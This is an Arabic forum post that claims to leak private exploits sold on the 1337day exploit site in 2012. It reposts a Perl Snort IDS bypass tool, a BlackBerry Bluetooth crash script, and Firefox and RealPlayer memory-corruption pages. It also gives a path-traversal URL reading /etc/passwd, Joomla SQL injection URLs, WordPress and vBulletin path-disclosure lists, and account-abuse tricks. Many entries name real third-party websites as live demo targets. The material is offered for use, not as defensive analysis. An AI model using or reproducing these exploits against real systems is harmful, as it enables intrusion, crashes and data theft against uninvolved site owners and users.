السلام عليكم روحمة الله وبركاته اليوم جاي لكم تسرب جميع ثغرات موقع 1237say المعروضة لللبيع
وقام بتسريبها mehdi racha
نبداء في الثغرات
بسم الله
GoogleMarket bug for Android 4.1.1=>4.2 Remote Target DL PoC
كود PHP:
//...Leaked bY beBoss..//
//......12.12.2012.....//
Google Market bug for Android 4.1.1 => 4.2 Jelly Bean Remote Target Download PoC
You need:
1) Google Account
2) Android device
3) PC + browser
You can install infinity count of apps to remote device from browser on PC.
The key is:
1) if you entered your google account once on android device
2) If you manage to get hold of someone elses account (gmail), you can install any apps from Google Play Market on this device.
3) without asking owner of device for agreement.
In such way you can install bad soft and also can install so many apps then memory of device will be filled
# 1337day.com [2012-12-12]
كود PHP:
//...Leaked bY beBoss..//
//......12.12.2012.....//
you can download POC from
http://1337day.com/private_files/msexcel2007poc.rar
mirror : http://www.mediafire.com/download.php?gc9h1yowx04c1c9
# 1337day.com [2012-12-12]
كود PHP:
//...Leaked bY beBoss..//
//......12.12.2012.....//
#!/usr/bin/perl
use IO::Socket;
# By Xianur0
# xianur0.null@gmail.com
# http://loscaballeros.mx/
# Snort Multiple HTTP Bypass
my $bypasscount=0;
die("Snort Multiple HTTP Bypass By Xianur0\n\nUse: snort.pl [URL]\nExample: snort.pl http://www.google.com/phpinfo.php\n\nUse: snort.pl [Path to snort rules]\nExample: snort.pl /home/xianur0/Descargas/snortrules-snapshot-2905/rules/\n") unless($ARGV[0]);
if(-f $ARGV[0] || -d $ARGV[0]){
print "[-] Analyzing Rules...\n\n";
checkrules($ARGV[0]);
} else {
tests();
}
sub hdump {
my $offset = 0;
my(@array,$format);
foreach my $data (unpack("a16"x(length($_[0])/16)."a*",$_[0])) {
my($len)=length($data);
if ($len == 16) {
@array = unpack('N4', $data);
$format="0x%08x (%05d) %08x %08x %08x %08x %s\n";
} else {
@array = unpack('C*', $data);
$_ = sprintf "%2.2x", $_ for @array;
push(@array, ' ') while $len++ < 16;
$format="0x%08x (%05d)" .
" %s%s%s%s %s%s%s%s %s%s%s%s %s%s%s%s %s\n";
}
$data =~ tr/0-37177-377/./;
printf $format,$offset,$offset,@array,$data;
$offset += 16;
}
}
sub snorthexdecode{
my $encoded=$_[0];
while($encoded =~ /|((s*([dw]{2})s*)+)|/) {
$cadena="\\|".$1."\\|";
$remplazo="";
my @caracteres=($cadena =~ /([dw]{2})/g);
foreach $caracter (@caracteres) {
$remplazo.=chr(hex($caracter));
}
$encoded=~s/$cadena/$remplazo/g;
}
return $encoded;
}
sub analizerules {
my $pathrules=$_[0];
if(-f $pathrules){
open RULE,$pathrules;
while(<RULE>) {
my $rule=$_;
$rule=~s/[rn]+$//g;
if($rule=~/http_uri;/ && $rule=~/content:s*"([^"]+)"/i){
if(snorthexdecode($1)=~/([^"]*.w{1,4})(|3F||?)([^"]+)/){
my $bypass=$1."?junk&".$3;
print "[!] Vuln rule ".$pathrules.": ".$rule."n[!] URI Bypass: ".$bypass."nn";
$bypasscount++;
}
} elsif($rule=~/http_header;/ && $rule=~/content:"([^"]+)"/){
if(snorthexdecode($1)=~/^([^:s]+:) (.+)$/){
my $bypass=$1."\t".$2;
print "[!] Vuln rule ".$pathrules.": ".$rule."\n[!] Header Bypass: ".$bypass."\n\n";
$bypasscount++;
}
}
}
} elsif(-d $pathrules) {
opendir (DIR, $pathrules);
while(readdir DIR) {
analizerules($pathrules."/".$_) if($_ !~/^.+$/);
}
}
}
sub checkrules {
my $checkpath=$_[0];
analizerules($checkpath);
print "[-] Bypassed rules: ".$bypasscount."\n";
}
sub tests {
my $host="";
my $port=80;
my $path="";
if($ARGV[0]=~/^http://([^/]+)(.*)$/){
$host=$1;
$path=$2;
if($host=~/^([^:]+):(d+)$/){
$host=$1;
$port=$2;
}
}
if($host!~/^[^:]+$/){
die('Invalid URL!');
}
print "[-]Target:\nHost: ".$host."\nPort: ".$port."\nPath: ".$path."\n\n";
if($path !~ "/(.+)"){
die('I need a path...');
$path=$1;
}
$encodedpath=$path;
$encodedpath=~s/([^/])/"%" . uc(sprintf("%2.2x",ord($1)))/eg;
print "[-] Encoded path: ".$encodedpath."\n";
@orders=("1st (CRLF)","2nd (+Pipelining)","3rd","4th","5th");
my $payload="POST / HTTP/1.1\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: 0\r\n".
"Connection: Keep-Alive\r\n".
"Host: ".$host.("\r\n"x12).
"POST / HTTP/1.1\r\n".
"Host: ".$host."\r\n".
"Connection: Keep-Alive\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: 30".("\r\n"x12).
"1234567890";
@packets = ("\n\n\n\nHEAD ".$path." HTTP/1.1\r\nHost: ".$host.":".$port."\r\nConnection: Close\r\n\r\n","");
$packets[1]=$payload.$packets[0];
$i=0;
foreach $packet (@packets){
my $sock = new IO::Socket::INET (
PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
print "[-] Seding ".$orders[$i]." test...\n";
hdump($packet);
print $sock $packet;
print "\n[+] Headers:\n";
my $todo="";
while(<$sock>){
$todo.=$_;
}
close($sock);
hdump($todo);
$i++;
}
}
# 1337day.com [2012-12-12]
كود PHP:
//...Leaked bY beBoss..//
//......12.12.2012.....//
http://logitheque.msn.fr/recherche/recherche.php?searchstring=../../../../../../../../etc/passwd%00&plus=telecharger&chaine=forums
# 1337day.com [2012-12-12]
كود PHP:
//...Leaked bY beBoss..//
//......12.12.2012.....//
#!/usr/bin/python
#Blackberry Bluetooth Crash (OBEX PUSH)
# By Xianur0
# xianur0.null@gmail.com
# First you need to connect to RFCOMM device (rfcomm connect 0 <bluetooth mac address> [channel])
# By default it uses the rfcomm0 but this number can be changed in the first argument of the command: rfcomm connect 0, rfcomm connect 1, etc...
# ATTENTION: The channel of obex push can vary from blackberry to blackberry
import binascii
import serial
filetosend="/home/xianur0/image.jpg"
nametosend="crashingyou.jpg"
def filenamed(string):
hexstring = "00"
for x in string:
hexstring += hex(ord(x))[2:]+"00"
return hexstring
def bin2dec(hexstring):
hexval = ""
for a in hexstring:
aux = hex(ord(a))[2:]
if len(aux) < 2:
aux = "0"+aux
hexval += aux
return int(hexval, 16)
def dec2hex(dec,largo):
retorno = hex(dec)[2:]
if (len(retorno)/2)*2 != len(retorno):
retorno = "0"+retorno
if(len(retorno)/2 < largo):
for i in range(largo-(len(retorno)/2)):
retorno = "00"+retorno
return retorno
def enviar(filepath,filename):
serialrf = None
print "Loading..."
try:
serialrf = serial.Serial('/dev/rfcomm0',9600) # Change me if rfcomm is not 0
except:
return 1
print "Ok!"
filename = filenamed(filename)
filebinary = ""
filehandler = open(filepath,'rb')
for linea in filehandler.readlines():
filebinary += linea
lengthfile = len(filebinary)
print "File Size:",lengthfile
sizefragment = 38
while True:
try:
print "Sending bytes..."
serialrf.write(binascii.unhexlify("80000710001000")) # Inicializamos
print "Reading..."
status = serialrf.read(1)
print hex(ord(status))
if hex(ord(status)) == "0xa0" or hex(ord(status)) == "0x10":
resto = serialrf.read(2)
largo = bin2dec(resto)-3
if largo > 0:
resto = serialrf.read(largo)
else:
return 2
header = "01"+dec2hex((len(filename)/2)+4,2) + filename + "00c3" + dec2hex(len(filebinary),4)
lengthheader = (len(filename)/2)+12
fragmento = filebinary[0:sizefragment]
envio = binascii.unhexlify("02" + dec2hex(lengthheader+(sizefragment+3),2) + header + "48" + dec2hex(len(fragmento)+3,2))
envio += fragmento
serialrf.write(envio)
except:
return 4
serialrf.close()
return 0
enviar(filetosend,nametosend)
# 1337day.com [2012-12-12]
كود PHP:
<!--
//...Leaked bY beBoss..//
//......12.12.2012.....//
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ `\ \/\ \/_/_\_<_ /'___ / /`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Mozilla FireFox 17.0 Memory Corruption p0c
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com .net .org
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : local - 0day
# Type : Local Exploit - proof of concept
# Tested on : Linux SUSE - Enterprise v.11
# Download : [http://download.cdn.mozilla.net/pub/mozilla.org/firefox/releases/17.0.1/linux-i686/fr/firefox-17.0.1.tar.bz2]
###
# <3 <3 Greetings t0 Palestine <3 <3
# Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting
-->
<html>
<head>
<title>Memory Corruption bY KedAns-Dz</title>
<body onload="javascript:KedAns();">
<script language="JavaScript">
function KedAns()
{
// (puf) it's just for make a buffer and Crash !
// some shellcode's work with this proof of concept, maybe can able to Corrupt* the MEM and Exec remote codes
var puf =unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
document.write(puf); // Buffer1
var buffer = '\x41\x42\x43' // ABC buffer
for(i=0; i <= 999 ; ++i)
{
buffer+=buffer+buffer
document.write(buffer); // Corrupt this !!!
}
// [ Memory Corruption !! (*__^) ]
}
</script>
</head>
</body>
</html>
<!--
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================ -->
# 1337day.com [2012-12-12]
كود PHP:
//...Leaked bY beBoss..//
//......12.12.2012.....//
The Full Path Disclosure is vBulletin 4.2.0, in forumrunner. With Full Path Disclosure you can get the path to the forum you're in and also (most of the times is the same) cpanel's username.
To see it go to:
http://[path]/forumrunner/include/album.php
It works in 90% of the forums.
Example:
http://www.mgcproducts.com/forumrunner/include/album.php
http://atheistdiscussion.com/forumrunner/include/album.php
http://apolyton.net/forumrunner/include/album.php
http://www.romaniancommunity.net/forumrunner/include/album.php
http://www.ghosthax.com/forumrunner/include/album.php
http://www.reddotcity.net/forumrunner/include/album.php
http://www.sevenskins.com/forum/forumrunner/include/album.php
http://www.purevb.com/forumrunner/include/album.php
http://forum.hackersbrasil.com.br/forumrunner/include/album.php
# 1337day.com [2012-12-12]
كود PHP:
//...Leaked bY beBoss..//
//......12.12.2012.....//
The Full Path Disclosure is in Wordpress <= 3.4.2, with this information you can get the path to the site you're in and (in most of the cases) cpanel's username.
To see it go to:
http://[path]/wp-includes/rss-functions.php
Examples:
http://tsmp.us/wp-includes/rss-functions.php
http://tafeio.com/wp-includes/rss-functions.php
http://santana1540.com.br/wp-includes/rss-functions.php
It works in 90% of the websites
# 1337day.com [2012-12-12]
كود PHP:
//...Leaked bY beBoss..//
//......12.12.2012.....//
/includes/api/commonRedRedRedRedRedlist_2.php
/includes/api/commonRedRedRedRedRedlist_5.php
/includes/api/commonRedRedRedRedRedlist_6.php
/includes/api/1/album_album.php
/includes/api/1/album_editalbum.php
/includes/api/1/album_latest.php
/includes/api/1/album_overview.php
/includes/api/1/album_picture.php
/includes/api/1/album_user.php
/includes/api/1/announcement_edit.php
/includes/api/1/announcement_view.php
/includes/api/1/api_cmscategorylist.php
/includes/api/1/api_cmssectionlist.php
/includes/api/1/api_forumlist.php
/includes/api/1/api_getnewtop.php
/includes/api/1/api_getsecuritytoken.php
/includes/api/1/api_getsessionhash.php
/includes/api/1/api_init.php
/includes/api/1/api_mobilepublisher.php
/includes/api/1/api_usersearch.php
/includes/api/1/blog_blog.php
/includes/api/1/blog_bloglist.php
/includes/api/1/blog_comments.php
/includes/api/1/blog_custompage.php
/includes/api/1/blog_dosendtofriend.php
/includes/api/1/blog_list.php
/includes/api/1/blog_members.php
/includes/api/1/blog_post_comment.php
/includes/api/1/blog_post_editblog.php
/includes/api/1/blog_post_editcomment.php
/includes/api/1/blog_post_edittrackback.php
/includes/api/1/blog_post_newblog.php
/includes/api/1/blog_post_postcomment.php
/includes/api/1/blog_post_updateblog.php
/includes/api/1/blog_sendtofriend.php
/includes/api/1/blog_subscription_entrylist.php
/includes/api/1/blog_subscription_userlist.php
/includes/api/1/blog_usercp_addcat.php
/includes/api/1/blog_usercp_editcat.php
/includes/api/1/blog_usercp_editoptions.php
/includes/api/1/blog_usercp_editprofile.php
/includes/api/1/blog_usercp_modifycat.php
/includes/api/1/blog_usercp_updateprofile.php
/includes/api/1/editpost_editpost.php
/includes/api/1/editpost_updatepost.php
/includes/api/1/forum.php
/includes/api/1/forumdisplay.php
/includes/api/1/inlinemod_domergeposts.php
/includes/api/1/list.php
/includes/api/1/login_lostpw.php
/includes/api/1/member.php
/includes/api/1/memberlist_search.php
/includes/api/1/misc_showattachments.php
/includes/api/1/misc_whoposted.php
/includes/api/1/newreply_newreply.php
/includes/api/1/newreply_postreply.php
/includes/api/1/newthread_postthread.php
/includes/api/1/newthread_newthread.php
/includes/api/1/poll_newpoll.php
/includes/api/1/poll_polledit.php
/includes/api/1/poll_showresults.php
/includes/api/1/private_editfolders.php
/includes/api/1/private_insertpm.php
/includes/api/1/private_messagelist.php
/includes/api/1/private_newpm.php
/includes/api/1/private_showpm.php
/includes/api/1/private_trackpm.php
/includes/api/1/profile_editattachments.php
/includes/api/1/profile_editoptions.php
/includes/api/1/profile_editprofile.php
/includes/api/1/register_addmember.php
/includes/api/1/register_checkdate.php
/includes/api/1/search_process.php
/includes/api/1/search_showresults.php
/includes/api/1/showthread.php
/includes/api/1/subscription_addsubscription.php
/includes/api/1/subscription_editfolders.php
/includes/api/1/subscription_viewsubscription.php
/includes/api/1/threadtag_managetags.php
/includes/api/2/album_picture.php
/includes/api/2/api_blogcategorylist.php
/includes/api/2/blog_blog.php
/includes/api/2/blog_bloglist.php
/includes/api/2/blog_list.php
/includes/api/2/blog_subscription_entrylist.php
/includes/api/2/blog_subscription_userlist.php
/includes/api/2/blog_usercp_groups.php
/includes/api/2/content.php
/includes/api/2/editpost_editpost.php
/includes/api/2/forumdisplay.php
/includes/api/2/member.php
/includes/api/2/newreply_newreply.php
/includes/api/2/forum.php
/includes/api/2/poll_newpoll.php
/includes/api/2/poll_polledit.php
/includes/api/2/poll_showresults.php
/includes/api/2/private_messagelist.php
/includes/api/2/private_trackpm.php
/includes/api/2/profile_editattachments.php
/includes/api/2/search_showresults.php
/includes/api/2/showthread.php
/includes/api/3/api_gotonewpost.php
/includes/api/4/album_user.php
/includes/api/4/api_forumlist.php
/includes/api/4/api_getnewtop.php
/includes/api/4/breadcrumbs_create.php
/includes/api/4/facebook_getforumid.php
/includes/api/4/facebook_getnewforummembers.php
/includes/api/4/get_vbfromfacebook.php
/includes/api/4/login_facebook.php
/includes/api/4/newreply_postreply.php
/includes/api/4/newthread_postthread.php
/includes/api/4/register.php
/includes/api/4/register_addmember.php
/includes/api/4/search_findusers.php
/includes/api/4/subscription_viewsubscription.php
/includes/api/5/api_init.php
/includes/api/6/api_getnewtop.php
/includes/api/6/api_gotonewpost.php
/includes/api/6/content.php
/includes/api/6/member.php
/includes/api/6/newthread_newthread.php
/includes/block/blogentries.php
/includes/block/cmsarticles.php
/includes/block/html.php
/includes/block/newposts.php
/includes/block/sgdiscussions.php
/includes/block/tagcloud.php
/includes/block/threads.php
/forumrunner/include/subscriptions.php
/forumrunner/include/search_forum.php
/forumrunner/include/profile.php
/forumrunner/include/post.php
/forumrunner/include/pms.php
/forumrunner/include/online.php
/forumrunner/include/moderation.php
/forumrunner/include/misc.php
/forumrunner/include/login.php
/forumrunner/include/get_thread.php
/forumrunner/include/get_forum.php
/forumrunner/include/cms.php
/forumrunner/include/attach.php
/forumrunner/include/announcement.php
/forumrunner/include/album.php
/forumrunner/support/vbulletin_methods.php
/forumrunner/support/stringparser_bbcode.class.php
/forumrunner/support/utils.php
/forumrunner/support/other_methods.php
/packages/skimlinks/hooks/postbit_display_complete.php
/packages/skimlinks/hooks/showthread_complete.php
/packages/skimlinks/hooks/userdata_start.php
# 1337day.com [2012-12-12]
كود PHP:
<!--
//...Leaked bY beBoss..//
//......12.12.2012.....//
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ `\ \/\ \/_/_\_<_ /'___ / /`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : RealPlayer .html v15.0.6.14 Memory Corruption and Overflow POC
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com .net .org
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : local - 0day
# Type : Local Exploit - proof of concept
# Tested on : Windows7 (Fr)
###
# <3 <3 Greetings t0 Palestine <3 <3
# Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting
Info :
Save the HTML Code as p0c.html and drop/open it with Realplayer
ABCABC........... Boom !!! ^__^
-->
<html>
<head>
<title>Memory Corruption bY KedAns-Dz</title>
<body onload="javascript:KedAns();">
<script language="JavaScript">
function KedAns()
{
// (puf) it's just for make a buffer and Crash !
var puf =unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
document.write(puf); // Buffer1
var buffer = '\x41\x42\x43' // ABC buffer
for(i=0; i <= 999 ; ++i)
{
buffer+=buffer+buffer
document.write(buffer); // Corrupt this !!!
}
// [ Memory Corruption !! (*__^) ]
}
</script>
</head>
</body>
</html>
<!--
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================ -->
# 1337day.com [2012-12-12]
كود PHP:
//...Leaked bY beBoss..//
//......12.12.2012.....//
Exploit:
admin/upgrade/index.php?app=upgrade&s=§ion[]=index&do=login
Dork:
intext:Community Forum Software by IP.Board
Fix:
Turn off display_errors in php.ini
# 1337day.com [2012-12-12]
كود PHP:
//...Leaked bY beBoss..//
//......12.12.2012.....//
POC:
0x01 - Download the steam client for linux here: http://media.steampowered.com/client/installer/steam.deb
0x02 - Login to your account using the Steam Client normally
0x03 - There will be a MsgBox saying that you do not have authorization, Do not click OK, and normally use as if authorization
# 1337day.com [2012-12-12]
كود PHP:
//...Leaked bY beBoss..//
//......12.12.2012.....//
# Exploit Title: wordpress 3.5 multiple path disclosure vulnerabilities
# Date: [12.12.12]
# Author: [Cyb3rboy]
# Vendor or Software Link: [wordpress.org]
# Version: [wordpress 3.5]
# Category:: [webapps]
# Google dork: [use brain ]
# Tested on: [windows]
the following directories is vulnerable to path disclosure vulnerability in word-press 3.5
/wp-settings.php
POC :- http://sqayasia.com/wp-settings.php
http://www.way2blogging.org/wp-settings.php
/wp-includes/admin-bar.php
POC:- http://sqayasia.com/wp-includes/admin-bar.php
http://www.way2blogging.org/wp-includes/admin-bar.php
/wp-includes/author-template.php
Poc:- http://sqayasia.com/wp-includes/author-template.php
http://www.way2blogging.org/wp-includes/author-template.php
/wp-includes/canonical.php
Poc:- http://sqayasia.com/wp-includes/canonical.php
/wp-includes/category-template.php
Poc:- http://sqayasia.com/wp-includes/category-template.php
http://www.way2blogging.org/wp-includes/category-template.php
/wp-includes/class-wp-embed.php
Poc:- http://sqayasia.com/wp-includes/class-wp-embed.php
http://www.way2blogging.org
/wp-includes/media.php
POc:- http://sqayasia.com/wp-includes/media.php
/wp-includes/ms-default-constants.php
Poc :- http://sqayasia.com/wp-includes/ms-default-constants.php
http://www.way2blogging.org
/wp-includes/ms-default-filters.php
Poc:- http://sqayasia.com/wp-includes/ms-default-filters.php
http://www.way2blogging.org
/wp-includes/ms-settings.php
Poc:- http://sqayasia.com/wp-includes/ms-settings.php
http://www.way2blogging.org
/wp-includes/post.php
Poc:- http://sqayasia.com/wp-includes/post.php
http://www.way2blogging.org
/wp-includes/rss.php
Poc:- http://sqayasia.com/wp-includes/rss.php
http://www.way2blogging.org/wp-includes/rss.php
/wp-includes/user.php
Poc:- http://sqayasia.com/wp-includes/user.php
http://www.way2blogging.org/wp-includes/user.php
/wp-includes/theme.php
Poc:- http://sqayasia.com/wp-includes/theme.php
http://www.way2blogging.org/wp-includes/theme.php
/wp-includes/vars.php
Poc:- http://sqayasia.com/wp-includes/vars.php
http://www.way2blogging.org/wp-includes/vars.php
/wp-includes/class-wp-http-ixr-client.php
Poc:- http://sqayasia.com/wp-includes/class-wp-http-ixr-client.php
/wp-includes/class-wp-image-editor-gd.php
Poc:- http://sqayasia.com/wp-includes/class-wp-image-editor-gd.php
http://www.way2blogging.org/wp-includes/class-wp-image-editor-gd.php
/wp-includes/class-wp-image-editor-imagick.php
Poc:- http://sqayasia.com/wp-includes/class-wp-image-editor-imagick.php
http://www.way2blogging.org/wp-includes/class-wp-image-editor-imagick.php
/wp-includes/class-wp-xmlrpc-server.php
Poc:- http://sqayasia.com/wp-includes/class-wp-xmlrpc-server.php
http://www.way2blogging.org/wp-includes/class-wp-xmlrpc-server.php
/wp-includes/class.wp-scripts.php
Poc:- http://sqayasia.com/wp-includes/class.wp-scripts.php
http://www.way2blogging.org/wp-includes/class.wp-scripts.php
/wp-includes/class.wp-styles.php
Poc:- http://sqayasia.com/wp-includes/class.wp-styles.php
http://www.way2blogging.org/wp-includes/class.wp-styles.php
/wp-includes/comment-template.php
Poc:- http://sqayasia.com/wp-includes/comment-template.php
http://www.way2blogging.org/wp-includes/comment-template.php
/wp-includes/default-filters.php
Poc:- http://sqayasia.com/wp-includes/default-filters.php
http://www.way2blogging.org/wp-includes/default-filters.php
/wp-includes/default-widgets.php
Poc:- http://sqayasia.com/wp-includes/default-widgets.php
http://www.way2blogging.org/wp-includes/default-widgets.php
/wp-includes/feed-atom-comments.php
Poc:- http://sqayasia.com/wp-includes/feed-atom-comments.php
http://www.way2blogging.org/wp-includes/feed-atom-comments.php
/wp-includes/feed-atom.php
Poc:- http://sqayasia.com/wp-includes/feed-atom.php
http://www.way2blogging.org/wp-includes/feed-atom.php
/wp-includes/feed-rdf.php
Poc:-http://sqayasia.com/wp-includes/feed-rdf.php
http://www.way2blogging.org/wp-includes/feed-rdf.php
/wp-includes/feed-rss.php
Poc:-http://sqayasia.com/wp-includes/feed-rss.php
http://www.way2blogging.org/wp-includes/feed-rss.php
/wp-includes/feed-rss2-comments.php
Poc:- http://sqayasia.com/wp-includes/feed-rss2-comments.php
http://www.way2blogging.org/wp-includes/feed-rss2-comments.php
/wp-includes/feed-rss2.php
Poc:- http://sqayasia.com/wp-includes/feed-rss2.php
http://www.way2blogging.org/wp-includes/feed-rss2.php
/wp-includes/functions.php
Poc:- http://sqayasia.com/wp-includes/functions.php
http://www.way2blogging.org/wp-includes/functions.php
# 1337day.com [2012-12-12]
كود PHP:
//...Leaked bY beBoss..//
//......12.12.2012.....//
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ `\ \/\ \/_/_\_<_ /'___ / /`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Caddy-dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
####
# Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
# E-mail: islam_babia@hotmail.com
# Category:: webapps
# script home : http://joomla.com
# Dork : inurl:option=com_user
# Security Risk: critical
# Tested on: Back|Track 5 KDE / French
####
# this was written for educational purpose only. use it at your own risk.
# author will be not responsible for any damage caused! user assumes all responsibility
# intended for authorized web application pentesting only!
// Description :
the affected component is /com_user/ in all joomla v1.5
P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version :-)
// Exploit :
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection) [replacing id number by character]
# priv8 youtube link, just people who has the link could view : http://www.youtube.com/watch?v=g0QcjxIb68I
// Demo :
http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemid=1'
http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='
http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemid='
http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemid='
# Greets To : ==============================================================================
